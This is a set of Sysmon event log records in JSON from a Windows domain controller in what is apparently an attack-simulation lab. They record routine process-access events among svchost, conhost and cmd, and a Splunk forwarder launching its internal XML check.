{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.575\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-001073F50300}\r\nProcessId: 4044\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-106F-5F25-0000-0010C4F40300}\r\nParentProcessId: 3784\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.575","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-001073F50300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010C4F40300}","ParentProcessId":"3784","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nSourceProcessId: 3784\r\nSourceThreadId: 3940\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","SourceProcessId":"3784","SourceThreadId":"3940","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
